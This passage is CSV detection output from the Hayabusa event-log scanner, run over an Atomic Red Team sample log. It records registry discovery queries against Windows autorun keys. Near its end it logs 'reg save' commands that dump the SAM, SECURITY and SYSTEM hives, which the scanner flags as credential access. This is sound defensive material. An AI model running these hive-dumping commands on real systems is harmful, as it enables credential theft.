PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 
0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c 
""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: 
C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query 
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query 
Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | 
PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and 
